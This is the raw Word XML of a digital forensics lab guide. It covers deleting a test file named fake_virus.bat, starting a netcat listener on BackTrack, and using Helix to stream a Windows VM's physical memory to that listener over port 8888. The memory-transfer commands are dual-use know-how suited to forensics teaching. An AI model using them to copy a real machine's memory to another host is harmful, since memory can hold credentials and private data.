    <w:p w14:paraId="441FC51B" w14:textId="77777777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Click Delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFB69A" w14:textId="11D97E25" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Send to Recycle Bin? Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86A047" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BF911E" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="002F1720" w14:textId="3979ABB6" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CA279D" wp14:editId="1289C250">
            <wp:extent cx="5943314" cy="5831840"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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533" cy="5837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89043" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762F89E6" w14:textId="632C248B" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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10. Delete the fake_virus.bat file for the Recycle Bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA2B4D" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBEE6F" w14:textId="77777777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Navigate to the Recycle Bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C26DA69" w14:textId="77777777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Right Click on fake_virus.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995CFED" w14:textId="77777777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Click Delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63569282" w14:textId="77777777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Are you sure want to delete 'fake_virus.bat'? Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F7626" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5BD83" w14:textId="1CA43905" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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We are completly removing this file, so we have a deleted file to both analyze and recover with preceding forensic labs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82DD63" w14:textId="557FA04A" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470D507A" wp14:editId="60322121">
            <wp:extent cx="5943395" cy="5374640"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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912" cy="5381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99693" w14:textId="19396AB4" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 8. Start Up NetCat  Listener To Receive Physical Memory Dump From Helix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF4605" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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1FF4EBA8" w14:textId="11A3D5FB" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open a console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120140DC" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE045C" w14:textId="5521ED92" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click on the console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554ACCA" w14:textId="0929814C" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8B5EB9" wp14:editId="1D3D9FC1">
            <wp:extent cx="5943430" cy="5717540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645" cy="572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9F539" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Get IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21815D02" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9CC45" w14:textId="77777777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ifconfig -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E7C43" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71E04B" w14:textId="77777777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As indicated below, my IP address is 192.168.1.105.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C4E7F" w14:textId="2EB681CD" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Please record your IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E662C" w14:textId="0D487C8F" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECDAF6C" wp14:editId="439A4893">
            <wp:extent cx="6223105" cy="6060440"/>
            <wp:effectExtent l="0" t="0" r="0" b="101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066" cy="608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CC04A" w14:textId="1CA86284" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start Up Netcat on BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489C375" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C1A9F" w14:textId="77777777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mkdir -p /FORENSICS/images/1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55362BAA" w14:textId="77777777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cd /FORENSICS/images/1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35F3CC" w14:textId="77777777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nc -l -vvv -p 8888 &gt; WV01_PM_fake_virus.dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6A730" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Netcat will listen for Helix to send the Memory Image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD89A41" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Nothing will be sent until you complete the following section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A3776" w14:textId="53A283D5" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Continue to Next Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D81728" w14:textId="1B7C53A2" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A8E26A" wp14:editId="3D933F51">
            <wp:extent cx="5943430" cy="6060440"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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839" cy="607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42029" w14:textId="42ABB2FD" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 9. Start Helix to Send Physical Memory to BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369A273" w14:textId="62589F53" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.Edit Virtual Machine Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689CE34" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE66DB" w14:textId="6FB84BBF" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Virtual Machine --&gt; Virtual Machine Settings...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE529FC" w14:textId="008105C4" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52870AFA" wp14:editId="54C0193E">
            <wp:extent cx="5943462" cy="5146040"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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063" cy="515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C6D06" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Configure Windows to load the Helix iso as a CD/DVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F3E1E" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383EF4EB" w14:textId="77777777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Select CD/DVD (IDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246A420" w14:textId="77777777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Select the Use ISO image file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1347C6" w14:textId="77777777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Browse to where you saved the Helix iso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB56334" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Note:  In my case, I save it in the following location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EFD5C" w14:textId="72AB876C" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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H:\BOOT ISO\Helix2008R1.iso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397729A7" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B85C968" w14:textId="3B091E48" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBDF1AF" wp14:editId="71B08ED2">
            <wp:extent cx="5943500" cy="3431540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10" cy="3437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77778" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781FC08C" w14:textId="43560072" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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3. Helix Screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752ABDC2" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665BB2B" w14:textId="03BEA1E8" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Select Accept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BF3F9" w14:textId="76B3115D" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="623E6CA4" wp14:editId="4971B134">
            <wp:extent cx="5943512" cy="5374640"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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359" cy="538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EDAB2" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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03851E08" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Live Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDCF62" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C699819" w14:textId="77777777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Click on the Camera Icon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCEB73" w14:textId="77777777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Select "\\PhysicalMemory" from the Source Dropdown Menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E151B3" w14:textId="77777777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Select the NetCat Radio Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D081F55" w14:textId="77777777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Destination IP: Provide BackTrack's IP Address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA701E1" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Obtain BackTrack's IP in Section 8, Step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFF447" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In my case, it is 192.168.1.105.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AEBAE" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In your case, it will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334072A4" w14:textId="77777777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Port: 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7AC955" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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This is the Listening NetCat Port on the BackTrack Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD898E0" w14:textId="638A8DDB" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click Acquire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570EB71" w14:textId="72125689" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E8D4A6" wp14:editId="32B99FC9">
            <wp:extent cx="5942965" cy="5023857"/>
            <wp:effectExtent l="0" t="0" r="635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747" cy="5031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31309" w14:textId="0A0D9036" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE0342" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DCE8A5" w14:textId="5E184C03" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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 xml:space="preserve">Click Yes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562104E" w14:textId="71FAC1EC" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D9F028" wp14:editId="1F08D30F">
            <wp:extent cx="5942965" cy="4688840"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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515" cy="469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EF5CC" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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Helix Informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8592A" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B719A17" w14:textId="77777777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You will see a black command prompt like below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60314BAE" w14:textId="77777777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Notice it will say "Copying Physical memory"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF4DF8" w14:textId="5E313E8E" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239C074" w14:textId="77826B34" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74824C73" wp14:editId="2F11EA5D">
            <wp:extent cx="5943512" cy="5031740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63" cy="5038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1F624" w14:textId="3B85E6AA" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 10: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F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Verify Physical Memory Dump on BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50B413" w14:textId="111896B2" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
